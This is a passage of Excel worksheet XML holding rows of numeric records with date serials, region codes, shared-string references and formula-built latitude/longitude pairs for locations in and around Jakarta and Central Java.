        <v>547</v>
      </c>
      <c r="T1030" t="s">
        <v>33</v>
      </c>
      <c r="U1030" s="5">
        <v>10693929</v>
      </c>
      <c r="V1030" s="5" t="s">
        <v>15412</v>
      </c>
      <c r="W1030" s="5">
        <v>-610760</v>
      </c>
      <c r="X1030" t="s">
        <v>19199</v>
      </c>
      <c r="Y1030" t="str">
        <f t="shared" si="16"/>
        <v>-6.10760,106.93929</v>
      </c>
    </row>
    <row r="1031" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1031">
        <v>108602</v>
      </c>
      <c r="B1031" s="1">
        <v>43884</v>
      </c>
      <c r="C1031">
        <v>1</v>
      </c>
      <c r="D1031" t="s">
        <v>22</v>
      </c>
      <c r="E1031" t="s">
        <v>23</v>
      </c>
      <c r="F1031" t="s">
        <v>3916</v>
      </c>
      <c r="H1031" t="s">
        <v>26</v>
      </c>
      <c r="I1031" t="s">
        <v>271</v>
      </c>
      <c r="J1031" t="s">
        <v>2407</v>
      </c>
      <c r="L1031" t="s">
        <v>3917</v>
      </c>
      <c r="M1031">
        <v>3175060006</v>
      </c>
      <c r="N1031">
        <v>3175060</v>
      </c>
      <c r="O1031">
        <v>3175</v>
      </c>
      <c r="P1031">
        <v>31</v>
      </c>
      <c r="Q1031" t="s">
        <v>2409</v>
      </c>
      <c r="R1031" t="s">
        <v>2279</v>
      </c>
      <c r="S1031" t="s">
        <v>547</v>
      </c>
      <c r="T1031" t="s">
        <v>33</v>
      </c>
      <c r="U1031" s="5">
        <v>10692571</v>
      </c>
      <c r="V1031" s="5" t="s">
        <v>15413</v>
      </c>
      <c r="W1031" s="5">
        <v>-613160</v>
      </c>
      <c r="X1031" t="s">
        <v>19200</v>
      </c>
      <c r="Y1031" t="str">
        <f t="shared" si="16"/>
        <v>-6.13160,106.92571</v>
      </c>
    </row>
    <row r="1032" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1032">
        <v>108603</v>
      </c>
      <c r="B1032" s="1">
        <v>43884</v>
      </c>
      <c r="C1032">
        <v>1</v>
      </c>
      <c r="D1032" t="s">
        <v>22</v>
      </c>
      <c r="E1032" t="s">
        <v>23</v>
      </c>
      <c r="F1032" t="s">
        <v>3918</v>
      </c>
      <c r="G1032" t="s">
        <v>3919</v>
      </c>
      <c r="H1032" t="s">
        <v>26</v>
      </c>
      <c r="I1032" t="s">
        <v>628</v>
      </c>
      <c r="J1032" t="s">
        <v>2412</v>
      </c>
      <c r="L1032" t="s">
        <v>3920</v>
      </c>
      <c r="M1032">
        <v>3172090006</v>
      </c>
      <c r="N1032">
        <v>3172090</v>
      </c>
      <c r="O1032">
        <v>3172</v>
      </c>
      <c r="P1032">
        <v>31</v>
      </c>
      <c r="Q1032" t="s">
        <v>2283</v>
      </c>
      <c r="R1032" t="s">
        <v>890</v>
      </c>
      <c r="S1032" t="s">
        <v>49</v>
      </c>
      <c r="T1032" t="s">
        <v>33</v>
      </c>
      <c r="U1032" s="5">
        <v>10687994</v>
      </c>
      <c r="V1032" s="5" t="s">
        <v>15414</v>
      </c>
      <c r="W1032" s="5">
        <v>-617636</v>
      </c>
      <c r="X1032" t="s">
        <v>19201</v>
      </c>
      <c r="Y1032" t="str">
        <f t="shared" si="16"/>
        <v>-6.17636,106.87994</v>
      </c>
    </row>
    <row r="1033" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1033">
        <v>108604</v>
      </c>
      <c r="B1033" s="1">
        <v>43884</v>
      </c>
      <c r="C1033">
        <v>1</v>
      </c>
      <c r="D1033" t="s">
        <v>22</v>
      </c>
      <c r="E1033" t="s">
        <v>23</v>
      </c>
      <c r="F1033" t="s">
        <v>3921</v>
      </c>
      <c r="H1033" t="s">
        <v>26</v>
      </c>
      <c r="I1033" t="s">
        <v>271</v>
      </c>
      <c r="J1033" t="s">
        <v>2627</v>
      </c>
      <c r="L1033" t="s">
        <v>3922</v>
      </c>
      <c r="M1033">
        <v>3275061004</v>
      </c>
      <c r="N1033">
        <v>3275061</v>
      </c>
      <c r="O1033">
        <v>3275</v>
      </c>
      <c r="P1033">
        <v>32</v>
      </c>
      <c r="Q1033" t="s">
        <v>39</v>
      </c>
      <c r="R1033" t="s">
        <v>40</v>
      </c>
      <c r="S1033" t="s">
        <v>41</v>
      </c>
      <c r="T1033" t="s">
        <v>42</v>
      </c>
      <c r="U1033" s="5">
        <v>10698933</v>
      </c>
      <c r="V1033" s="5" t="s">
        <v>15415</v>
      </c>
      <c r="W1033" s="5">
        <v>-617283</v>
      </c>
      <c r="X1033" t="s">
        <v>19202</v>
      </c>
      <c r="Y1033" t="str">
        <f t="shared" si="16"/>
        <v>-6.17283,106.98933</v>
      </c>
    </row>
    <row r="1034" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1034">
        <v>108605</v>
      </c>
      <c r="B1034" s="1">
        <v>43884</v>
      </c>
      <c r="C1034">
        <v>1</v>
      </c>
      <c r="D1034" t="s">
        <v>22</v>
      </c>
      <c r="E1034" t="s">
        <v>23</v>
      </c>
      <c r="F1034" t="s">
        <v>3923</v>
      </c>
      <c r="G1034" t="s">
        <v>3924</v>
      </c>
      <c r="H1034" t="s">
        <v>26</v>
      </c>
      <c r="I1034" t="s">
        <v>65</v>
      </c>
      <c r="J1034" t="s">
        <v>2415</v>
      </c>
      <c r="L1034" t="s">
        <v>3925</v>
      </c>
      <c r="M1034">
        <v>3175050001</v>
      </c>
      <c r="N1034">
        <v>3175050</v>
      </c>
      <c r="O1034">
        <v>3175</v>
      </c>
      <c r="P1034">
        <v>31</v>
      </c>
      <c r="Q1034" t="s">
        <v>1037</v>
      </c>
      <c r="R1034" t="s">
        <v>1013</v>
      </c>
      <c r="S1034" t="s">
        <v>547</v>
      </c>
      <c r="T1034" t="s">
        <v>33</v>
      </c>
      <c r="U1034" s="5">
        <v>10689872</v>
      </c>
      <c r="V1034" s="5" t="s">
        <v>15290</v>
      </c>
      <c r="W1034" s="5">
        <v>-614950</v>
      </c>
      <c r="X1034" t="s">
        <v>19203</v>
      </c>
      <c r="Y1034" t="str">
        <f t="shared" si="16"/>
        <v>-6.14950,106.89872</v>
      </c>
    </row>
    <row r="1035" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1035">
        <v>108606</v>
      </c>
      <c r="B1035" s="1">
        <v>43884</v>
      </c>
      <c r="C1035">
        <v>1</v>
      </c>
      <c r="D1035" t="s">
        <v>22</v>
      </c>
      <c r="E1035" t="s">
        <v>23</v>
      </c>
      <c r="F1035" t="s">
        <v>3926</v>
      </c>
      <c r="G1035" t="s">
        <v>3927</v>
      </c>
      <c r="H1035" t="s">
        <v>26</v>
      </c>
      <c r="I1035" t="s">
        <v>3275</v>
      </c>
      <c r="J1035" t="s">
        <v>3928</v>
      </c>
      <c r="L1035" t="s">
        <v>3929</v>
      </c>
      <c r="M1035">
        <v>3175060004</v>
      </c>
      <c r="N1035">
        <v>3175060</v>
      </c>
      <c r="O1035">
        <v>3175</v>
      </c>
      <c r="P1035">
        <v>31</v>
      </c>
      <c r="Q1035" t="s">
        <v>2279</v>
      </c>
      <c r="R1035" t="s">
        <v>2279</v>
      </c>
      <c r="S1035" t="s">
        <v>547</v>
      </c>
      <c r="T1035" t="s">
        <v>33</v>
      </c>
      <c r="U1035" s="5">
        <v>10693912</v>
      </c>
      <c r="V1035" s="5" t="s">
        <v>15416</v>
      </c>
      <c r="W1035" s="5">
        <v>-610915</v>
      </c>
      <c r="X1035" t="s">
        <v>19204</v>
      </c>
      <c r="Y1035" t="str">
        <f t="shared" si="16"/>
        <v>-6.10915,106.93912</v>
      </c>
    </row>
    <row r="1036" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1036">
        <v>108607</v>
      </c>
      <c r="B1036" s="1">
        <v>43884</v>
      </c>
      <c r="C1036">
        <v>1</v>
      </c>
      <c r="D1036" t="s">
        <v>22</v>
      </c>
      <c r="E1036" t="s">
        <v>23</v>
      </c>
      <c r="F1036" t="s">
        <v>3930</v>
      </c>
      <c r="H1036" t="s">
        <v>26</v>
      </c>
      <c r="I1036" t="s">
        <v>166</v>
      </c>
      <c r="J1036" t="s">
        <v>2705</v>
      </c>
      <c r="L1036" t="s">
        <v>3931</v>
      </c>
      <c r="M1036">
        <v>3172090006</v>
      </c>
      <c r="N1036">
        <v>3172090</v>
      </c>
      <c r="O1036">
        <v>3172</v>
      </c>
      <c r="P1036">
        <v>31</v>
      </c>
      <c r="Q1036" t="s">
        <v>2283</v>
      </c>
      <c r="R1036" t="s">
        <v>890</v>
      </c>
      <c r="S1036" t="s">
        <v>49</v>
      </c>
      <c r="T1036" t="s">
        <v>33</v>
      </c>
      <c r="U1036" s="5">
        <v>10688307</v>
      </c>
      <c r="V1036" s="5" t="s">
        <v>15417</v>
      </c>
      <c r="W1036" s="5">
        <v>-616968</v>
      </c>
      <c r="X1036" t="s">
        <v>19205</v>
      </c>
      <c r="Y1036" t="str">
        <f t="shared" si="16"/>
        <v>-6.16968,106.88307</v>
      </c>
    </row>
    <row r="1037" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1037">
        <v>108608</v>
      </c>
      <c r="B1037" s="1">
        <v>43884</v>
      </c>
      <c r="C1037">
        <v>1</v>
      </c>
      <c r="D1037" t="s">
        <v>22</v>
      </c>
      <c r="E1037" t="s">
        <v>23</v>
      </c>
      <c r="F1037" t="s">
        <v>3932</v>
      </c>
      <c r="H1037" t="s">
        <v>26</v>
      </c>
      <c r="I1037" t="s">
        <v>862</v>
      </c>
      <c r="J1037" t="s">
        <v>3438</v>
      </c>
      <c r="L1037" t="s">
        <v>3933</v>
      </c>
      <c r="M1037">
        <v>3172090007</v>
      </c>
      <c r="N1037">
        <v>3172090</v>
      </c>
      <c r="O1037">
        <v>3172</v>
      </c>
      <c r="P1037">
        <v>31</v>
      </c>
      <c r="Q1037" t="s">
        <v>890</v>
      </c>
      <c r="R1037" t="s">
        <v>890</v>
      </c>
      <c r="S1037" t="s">
        <v>49</v>
      </c>
      <c r="T1037" t="s">
        <v>33</v>
      </c>
      <c r="U1037" s="5">
        <v>10689991</v>
      </c>
      <c r="V1037" s="5" t="s">
        <v>15418</v>
      </c>
      <c r="W1037" s="5">
        <v>-618043</v>
      </c>
      <c r="X1037" t="s">
        <v>19062</v>
      </c>
      <c r="Y1037" t="str">
        <f t="shared" si="16"/>
        <v>-6.18043,106.89991</v>
      </c>
    </row>
    <row r="1038" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1038">
        <v>108609</v>
      </c>
      <c r="B1038" s="1">
        <v>43884</v>
      </c>
      <c r="C1038">
        <v>1</v>
      </c>
      <c r="D1038" t="s">
        <v>22</v>
      </c>
      <c r="E1038" t="s">
        <v>23</v>
      </c>
      <c r="F1038" t="s">
        <v>3934</v>
      </c>
      <c r="H1038" t="s">
        <v>26</v>
      </c>
      <c r="I1038" t="s">
        <v>784</v>
      </c>
      <c r="J1038" t="s">
        <v>3066</v>
      </c>
      <c r="L1038" t="s">
        <v>3935</v>
      </c>
      <c r="M1038">
        <v>3173020001</v>
      </c>
      <c r="N1038">
        <v>3173020</v>
      </c>
      <c r="O1038">
        <v>3173</v>
      </c>
      <c r="P1038">
        <v>31</v>
      </c>
      <c r="Q1038" t="s">
        <v>179</v>
      </c>
      <c r="R1038" t="s">
        <v>179</v>
      </c>
      <c r="S1038" t="s">
        <v>62</v>
      </c>
      <c r="T1038" t="s">
        <v>33</v>
      </c>
      <c r="U1038" s="5">
        <v>10683380</v>
      </c>
      <c r="V1038" s="5" t="s">
        <v>15158</v>
      </c>
      <c r="W1038" s="5">
        <v>-619926</v>
      </c>
      <c r="X1038" t="s">
        <v>18957</v>
      </c>
      <c r="Y1038" t="str">
        <f t="shared" si="16"/>
        <v>-6.19926,106.83380</v>
      </c>
    </row>
    <row r="1039" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1039">
        <v>108610</v>
      </c>
      <c r="B1039" s="1">
        <v>43884</v>
      </c>
      <c r="C1039">
        <v>1</v>
      </c>
      <c r="D1039" t="s">
        <v>22</v>
      </c>
      <c r="E1039" t="s">
        <v>23</v>
      </c>
      <c r="F1039" t="s">
        <v>3936</v>
      </c>
      <c r="H1039" t="s">
        <v>26</v>
      </c>
      <c r="I1039" t="s">
        <v>3937</v>
      </c>
      <c r="J1039" t="s">
        <v>3938</v>
      </c>
      <c r="L1039" t="s">
        <v>3939</v>
      </c>
      <c r="M1039">
        <v>3175040003</v>
      </c>
      <c r="N1039">
        <v>3175040</v>
      </c>
      <c r="O1039">
        <v>3175</v>
      </c>
      <c r="P1039">
        <v>31</v>
      </c>
      <c r="Q1039" t="s">
        <v>2062</v>
      </c>
      <c r="R1039" t="s">
        <v>2063</v>
      </c>
      <c r="S1039" t="s">
        <v>547</v>
      </c>
      <c r="T1039" t="s">
        <v>33</v>
      </c>
      <c r="U1039" s="5">
        <v>10691863</v>
      </c>
      <c r="V1039" s="5" t="s">
        <v>15419</v>
      </c>
      <c r="W1039" s="5">
        <v>-612762</v>
      </c>
      <c r="X1039" t="s">
        <v>19206</v>
      </c>
      <c r="Y1039" t="str">
        <f t="shared" si="16"/>
        <v>-6.12762,106.91863</v>
      </c>
    </row>
    <row r="1040" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1040">
        <v>108611</v>
      </c>
      <c r="B1040" s="1">
        <v>43884</v>
      </c>
      <c r="C1040">
        <v>1</v>
      </c>
      <c r="D1040" t="s">
        <v>22</v>
      </c>
      <c r="E1040" t="s">
        <v>23</v>
      </c>
      <c r="F1040" t="s">
        <v>3940</v>
      </c>
      <c r="G1040" t="s">
        <v>3941</v>
      </c>
      <c r="H1040" t="s">
        <v>26</v>
      </c>
      <c r="I1040" t="s">
        <v>1683</v>
      </c>
      <c r="J1040" t="s">
        <v>2627</v>
      </c>
      <c r="L1040" t="s">
        <v>3942</v>
      </c>
      <c r="M1040">
        <v>3216061004</v>
      </c>
      <c r="N1040">
        <v>3216061</v>
      </c>
      <c r="O1040">
        <v>3216</v>
      </c>
      <c r="P1040">
        <v>32</v>
      </c>
      <c r="Q1040" t="s">
        <v>54</v>
      </c>
      <c r="R1040" t="s">
        <v>55</v>
      </c>
      <c r="S1040" t="s">
        <v>41</v>
      </c>
      <c r="T1040" t="s">
        <v>42</v>
      </c>
      <c r="U1040" s="5">
        <v>10716765</v>
      </c>
      <c r="V1040" s="5" t="s">
        <v>15420</v>
      </c>
      <c r="W1040" s="5">
        <v>-630452</v>
      </c>
      <c r="X1040" t="s">
        <v>19207</v>
      </c>
      <c r="Y1040" t="str">
        <f t="shared" si="16"/>
        <v>-6.30452,107.16765</v>
      </c>
    </row>
    <row r="1041" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1041">
        <v>108612</v>
      </c>
      <c r="B1041" s="1">
        <v>43884</v>
      </c>
      <c r="C1041">
        <v>1</v>
      </c>
      <c r="D1041" t="s">
        <v>22</v>
      </c>
      <c r="E1041" t="s">
        <v>23</v>
      </c>
      <c r="F1041" t="s">
        <v>3943</v>
      </c>
      <c r="H1041" t="s">
        <v>26</v>
      </c>
      <c r="I1041" t="s">
        <v>197</v>
      </c>
      <c r="J1041" t="s">
        <v>2627</v>
      </c>
      <c r="L1041" t="s">
        <v>3944</v>
      </c>
      <c r="M1041">
        <v>3275050003</v>
      </c>
      <c r="N1041">
        <v>3275050</v>
      </c>
      <c r="O1041">
        <v>3275</v>
      </c>
      <c r="P1041">
        <v>32</v>
      </c>
      <c r="Q1041" t="s">
        <v>2310</v>
      </c>
      <c r="R1041" t="s">
        <v>955</v>
      </c>
      <c r="S1041" t="s">
        <v>41</v>
      </c>
      <c r="T1041" t="s">
        <v>42</v>
      </c>
      <c r="U1041" s="5">
        <v>10699133</v>
      </c>
      <c r="V1041" s="5" t="s">
        <v>15421</v>
      </c>
      <c r="W1041" s="5">
        <v>-624769</v>
      </c>
      <c r="X1041" t="s">
        <v>19208</v>
      </c>
      <c r="Y1041" t="str">
        <f t="shared" si="16"/>
        <v>-6.24769,106.99133</v>
      </c>
    </row>
    <row r="1042" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1042">
        <v>108613</v>
      </c>
      <c r="B1042" s="1">
        <v>43884</v>
      </c>
      <c r="C1042">
        <v>1</v>
      </c>
      <c r="D1042" t="s">
        <v>22</v>
      </c>
      <c r="E1042" t="s">
        <v>23</v>
      </c>
      <c r="F1042" t="s">
        <v>3945</v>
      </c>
      <c r="G1042" t="s">
        <v>3946</v>
      </c>
      <c r="H1042" t="s">
        <v>26</v>
      </c>
      <c r="I1042" t="s">
        <v>492</v>
      </c>
      <c r="J1042" t="s">
        <v>2627</v>
      </c>
      <c r="L1042" t="s">
        <v>3947</v>
      </c>
      <c r="M1042">
        <v>3216061004</v>
      </c>
      <c r="N1042">
        <v>3216061</v>
      </c>
      <c r="O1042">
        <v>3216</v>
      </c>
      <c r="P1042">
        <v>32</v>
      </c>
      <c r="Q1042" t="s">
        <v>54</v>
      </c>
      <c r="R1042" t="s">
        <v>55</v>
      </c>
      <c r="S1042" t="s">
        <v>41</v>
      </c>
      <c r="T1042" t="s">
        <v>42</v>
      </c>
      <c r="U1042" s="5">
        <v>10716427</v>
      </c>
      <c r="V1042" s="5" t="s">
        <v>15422</v>
      </c>
      <c r="W1042" s="5">
        <v>-630056</v>
      </c>
      <c r="X1042" t="s">
        <v>19209</v>
      </c>
      <c r="Y1042" t="str">
        <f t="shared" si="16"/>
        <v>-6.30056,107.16427</v>
      </c>
    </row>
    <row r="1043" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1043">
        <v>108614</v>
      </c>
      <c r="B1043" s="1">
        <v>43885</v>
      </c>
      <c r="C1043">
        <v>0</v>
      </c>
      <c r="D1043" t="s">
        <v>22</v>
      </c>
      <c r="E1043" t="s">
        <v>23</v>
      </c>
      <c r="F1043" t="s">
        <v>3948</v>
      </c>
      <c r="H1043" t="s">
        <v>26</v>
      </c>
      <c r="I1043" t="s">
        <v>1633</v>
      </c>
      <c r="J1043" t="s">
        <v>1745</v>
      </c>
      <c r="L1043" t="s">
        <v>3252</v>
      </c>
      <c r="M1043">
        <v>3175050003</v>
      </c>
      <c r="N1043">
        <v>3175050</v>
      </c>
      <c r="O1043">
        <v>3175</v>
      </c>
      <c r="P1043">
        <v>31</v>
      </c>
      <c r="Q1043" t="s">
        <v>1740</v>
      </c>
      <c r="R1043" t="s">
        <v>1013</v>
      </c>
      <c r="S1043" t="s">
        <v>547</v>
      </c>
      <c r="T1043" t="s">
        <v>33</v>
      </c>
      <c r="U1043" s="5">
        <v>10691296</v>
      </c>
      <c r="V1043" s="5" t="s">
        <v>15423</v>
      </c>
      <c r="W1043" s="5">
        <v>-615689</v>
      </c>
      <c r="X1043" t="s">
        <v>19210</v>
      </c>
      <c r="Y1043" t="str">
        <f t="shared" si="16"/>
        <v>-6.15689,106.91296</v>
      </c>
    </row>
    <row r="1044" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1044">
        <v>108615</v>
      </c>
      <c r="B1044" s="1">
        <v>43885</v>
      </c>
      <c r="C1044">
        <v>0</v>
      </c>
      <c r="D1044" t="s">
        <v>22</v>
      </c>
      <c r="E1044" t="s">
        <v>23</v>
      </c>
      <c r="F1044" t="s">
        <v>3949</v>
      </c>
      <c r="G1044" t="s">
        <v>3950</v>
      </c>
      <c r="H1044" t="s">
        <v>26</v>
      </c>
      <c r="I1044" t="s">
        <v>3951</v>
      </c>
      <c r="J1044" t="s">
        <v>2608</v>
      </c>
      <c r="L1044" t="s">
        <v>3952</v>
      </c>
      <c r="M1044">
        <v>3320030005</v>
      </c>
      <c r="N1044">
        <v>3320030</v>
      </c>
      <c r="O1044">
        <v>3320</v>
      </c>
      <c r="P1044">
        <v>33</v>
      </c>
      <c r="Q1044" t="s">
        <v>3953</v>
      </c>
      <c r="R1044" t="s">
        <v>3954</v>
      </c>
      <c r="S1044" t="s">
        <v>2976</v>
      </c>
      <c r="T1044" t="s">
        <v>1134</v>
      </c>
      <c r="U1044" s="5">
        <v>11071223</v>
      </c>
      <c r="V1044" s="5" t="s">
        <v>15424</v>
      </c>
      <c r="W1044" s="5">
        <v>-677948</v>
      </c>
      <c r="X1044" t="s">
        <v>19211</v>
      </c>
      <c r="Y1044" t="str">
        <f t="shared" si="16"/>
        <v>-6.77948,110.71223</v>
      </c>
    </row>
    <row r="1045" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1045">
        <v>108616</v>
      </c>
      <c r="B1045" s="1">
        <v>43885</v>
      </c>
      <c r="C1045">
        <v>0</v>
      </c>
      <c r="D1045" t="s">
        <v>22</v>
      </c>
      <c r="E1045" t="s">
        <v>23</v>
      </c>
      <c r="F1045" t="s">
        <v>3955</v>
      </c>
      <c r="G1045" t="s">
        <v>3956</v>
      </c>
      <c r="H1045" t="s">
        <v>26</v>
      </c>
      <c r="I1045" t="s">
        <v>974</v>
      </c>
      <c r="J1045" t="s">
        <v>2627</v>
      </c>
      <c r="L1045" t="s">
        <v>3957</v>
      </c>
      <c r="M1045">
        <v>3216100006</v>
      </c>
      <c r="N1045">
        <v>3216100</v>
      </c>
      <c r="O1045">
        <v>3216</v>
      </c>
      <c r="P1045">
        <v>32</v>
      </c>
      <c r="Q1045" t="s">
        <v>939</v>
      </c>
      <c r="R1045" t="s">
        <v>940</v>
      </c>
      <c r="S1045" t="s">
        <v>41</v>
      </c>
      <c r="T1045" t="s">
        <v>42</v>
      </c>
      <c r="U1045" s="5">
        <v>10699270</v>
      </c>
      <c r="V1045" s="5" t="s">
        <v>15425</v>
      </c>
      <c r="W1045" s="5">
        <v>-612227</v>
      </c>
      <c r="X1045" t="s">
        <v>19212</v>
      </c>
      <c r="Y1045" t="str">
        <f t="shared" si="16"/>
        <v>-6.12227,106.99270</v>
      </c>
    </row>
    <row r="1046" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1046">
        <v>108617</v>
      </c>
      <c r="B1046" s="1">
        <v>43885</v>
      </c>
      <c r="C1046">
        <v>0</v>
      </c>
      <c r="D1046" t="s">
        <v>22</v>
      </c>
      <c r="E1046" t="s">
        <v>23</v>
      </c>
      <c r="F1046" t="s">
        <v>3958</v>
      </c>
      <c r="G1046" t="s">
        <v>3959</v>
      </c>
      <c r="H1046" t="s">
        <v>26</v>
      </c>
      <c r="I1046" t="s">
        <v>137</v>
      </c>
      <c r="J1046" t="s">
        <v>3960</v>
      </c>
      <c r="L1046" t="s">
        <v>3961</v>
      </c>
      <c r="M1046">
        <v>3175060002</v>
      </c>
      <c r="N1046">
        <v>3175060</v>
      </c>
      <c r="O1046">
        <v>3175</v>
      </c>
      <c r="P1046">
        <v>31</v>
      </c>
      <c r="Q1046" t="s">
        <v>2674</v>
      </c>
      <c r="R1046" t="s">
        <v>2279</v>
      </c>
      <c r="S1046" t="s">
        <v>547</v>
      </c>
      <c r="T1046" t="s">
        <v>33</v>
      </c>
      <c r="U1046" s="5">
        <v>10695228</v>
      </c>
      <c r="V1046" s="5" t="s">
        <v>15426</v>
      </c>
      <c r="W1046" s="5">
        <v>-613801</v>
      </c>
      <c r="X1046" t="s">
        <v>19213</v>
      </c>
      <c r="Y1046" t="str">
        <f t="shared" si="16"/>
        <v>-6.13801,106.95228</v>
      </c>
    </row>
    <row r="1047" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1047">
        <v>108618</v>
      </c>
      <c r="B1047" s="1">
        <v>43885</v>
      </c>
      <c r="C1047">
        <v>0</v>
      </c>
      <c r="D1047" t="s">
        <v>22</v>
      </c>
      <c r="E1047" t="s">
        <v>23</v>
      </c>
      <c r="F1047" t="s">
        <v>3962</v>
      </c>
      <c r="G1047" t="s">
        <v>3963</v>
      </c>
      <c r="H1047" t="s">
        <v>26</v>
      </c>
      <c r="I1047" t="s">
        <v>386</v>
      </c>
      <c r="J1047" t="s">
        <v>2608</v>
      </c>
      <c r="L1047" t="s">
        <v>3964</v>
      </c>
      <c r="M1047">
        <v>3320030005</v>
      </c>
      <c r="N1047">
        <v>3320030</v>
      </c>
      <c r="O1047">
        <v>3320</v>
      </c>
      <c r="P1047">
        <v>33</v>
      </c>
      <c r="Q1047" t="s">
        <v>3953</v>
      </c>
      <c r="R1047" t="s">
        <v>3954</v>
      </c>
      <c r="S1047" t="s">
        <v>2976</v>
      </c>
      <c r="T1047" t="s">
        <v>1134</v>
      </c>
      <c r="U1047" s="5">
        <v>11071223</v>
      </c>
      <c r="V1047" s="5" t="s">
        <v>15424</v>
      </c>
      <c r="W1047" s="5">
        <v>-677948</v>
      </c>
      <c r="X1047" t="s">
        <v>19211</v>
      </c>
      <c r="Y1047" t="str">
        <f t="shared" si="16"/>
        <v>-6.77948,110.71223</v>
      </c>
    </row>
    <row r="1048" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1048">
        <v>108619</v>
      </c>
      <c r="B1048" s="1">
        <v>43885</v>
      </c>
      <c r="C1048">
        <v>0</v>
      </c>
      <c r="D1048" t="s">
        <v>22</v>
      </c>
      <c r="E1048" t="s">
        <v>23</v>
      </c>
      <c r="F1048" t="s">
        <v>3965</v>
      </c>
      <c r="G1048" t="s">
        <v>3966</v>
      </c>
      <c r="H1048" t="s">
        <v>26</v>
      </c>
      <c r="I1048" t="s">
        <v>367</v>
      </c>
      <c r="J1048" t="s">
        <v>2608</v>
      </c>
      <c r="L1048" t="s">
        <v>3967</v>
      </c>
      <c r="M1048">
        <v>3320030006</v>
      </c>
      <c r="N1048">
        <v>3320030</v>
      </c>
      <c r="O1048">
        <v>3320</v>
      </c>
      <c r="P1048">
        <v>33</v>
      </c>
      <c r="Q1048" t="s">
        <v>3954</v>
      </c>
      <c r="R1048" t="s">
        <v>3954</v>
      </c>
      <c r="S1048" t="s">
        <v>2976</v>
      </c>
      <c r="T1048" t="s">
        <v>1134</v>
      </c>
      <c r="U1048" s="5">
        <v>11072170</v>
      </c>
      <c r="V1048" s="5" t="s">
        <v>15427</v>
      </c>
      <c r="W1048" s="5">
        <v>-678125</v>
      </c>
      <c r="X1048" t="s">
        <v>19214</v>
      </c>
      <c r="Y1048" t="str">
        <f t="shared" si="16"/>
        <v>-6.78125,110.72170</v>
      </c>
    </row>
    <row r="1049" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1049">
        <v>108620</v>
      </c>
      <c r="B1049" s="1">
        <v>43885</v>
      </c>
      <c r="C1049">
        <v>0</v>
      </c>
      <c r="D1049" t="s">
        <v>22</v>
      </c>
      <c r="E1049" t="s">
        <v>23</v>
      </c>
      <c r="F1049" t="s">
        <v>3968</v>
      </c>
      <c r="G1049" t="s">
        <v>3969</v>
      </c>
      <c r="H1049" t="s">
        <v>26</v>
      </c>
      <c r="I1049" t="s">
        <v>166</v>
      </c>
      <c r="J1049" t="s">
        <v>2608</v>
      </c>
      <c r="L1049" t="s">
        <v>3970</v>
      </c>
      <c r="M1049">
        <v>3320030006</v>
      </c>
      <c r="N1049">
        <v>3320030</v>
      </c>
      <c r="O1049">
        <v>3320</v>
      </c>
      <c r="P1049">
        <v>33</v>
      </c>
      <c r="Q1049" t="s">
        <v>3954</v>
      </c>
      <c r="R1049" t="s">
        <v>3954</v>
      </c>
      <c r="S1049" t="s">
        <v>2976</v>
      </c>
      <c r="T1049" t="s">
        <v>1134</v>
      </c>
      <c r="U1049" s="5">
        <v>11072170</v>
      </c>
      <c r="V1049" s="5" t="s">
        <v>15427</v>
      </c>
      <c r="W1049" s="5">
        <v>-678125</v>
      </c>
      <c r="X1049" t="s">
        <v>19214</v>
      </c>
      <c r="Y1049" t="str">
        <f t="shared" si="16"/>
        <v>-6.78125,110.72170</v>
      </c>
    </row>
    <row r="1050" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1050">
        <v>108621</v>
      </c>
      <c r="B1050" s="1">
        <v>43885</v>
      </c>
      <c r="C1050">
        <v>0</v>
      </c>
      <c r="D1050" t="s">
        <v>22</v>
      </c>
      <c r="E1050" t="s">
        <v>23</v>
      </c>
      <c r="F1050" t="s">
        <v>3971</v>
      </c>
      <c r="G1050" t="s">
        <v>3972</v>
      </c>
      <c r="H1050" t="s">
        <v>26</v>
      </c>
      <c r="I1050" t="s">
        <v>3481</v>
      </c>
      <c r="J1050" t="s">
        <v>2608</v>
      </c>
      <c r="L1050" t="s">
        <v>3973</v>
      </c>
      <c r="M1050">
        <v>3320030006</v>
      </c>
      <c r="N1050">
        <v>3320030</v>
      </c>
      <c r="O1050">
        <v>3320</v>
      </c>
      <c r="P1050">
        <v>33</v>
      </c>
      <c r="Q1050" t="s">
        <v>3954</v>
      </c>
      <c r="R1050" t="s">
        <v>3954</v>
      </c>
      <c r="S1050" t="s">
        <v>2976</v>
      </c>
      <c r="T1050" t="s">
        <v>1134</v>
      </c>
      <c r="U1050" s="5">
        <v>11072170</v>
      </c>
      <c r="V1050" s="5" t="s">
        <v>15427</v>
      </c>
      <c r="W1050" s="5">
        <v>-678125</v>
      </c>
      <c r="X1050" t="s">
        <v>19214</v>
      </c>
      <c r="Y1050" t="str">
        <f t="shared" si="16"/>
        <v>-6.78125,110.72170</v>
      </c>
    </row>
    <row r="1051" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1051">
        <v>108622</v>
      </c>
      <c r="B1051" s="1">
        <v>43885</v>
      </c>
      <c r="C1051">
        <v>0</v>
      </c>
      <c r="D1051" t="s">
        <v>22</v>
      </c>
      <c r="E1051" t="s">
        <v>23</v>
      </c>
      <c r="F1051" t="s">
        <v>3974</v>
      </c>
      <c r="G1051" t="s">
        <v>3975</v>
      </c>
      <c r="H1051" t="s">
        <v>26</v>
      </c>
      <c r="I1051" t="s">
        <v>784</v>
      </c>
      <c r="J1051" t="s">
        <v>2627</v>
      </c>
      <c r="L1051" t="s">
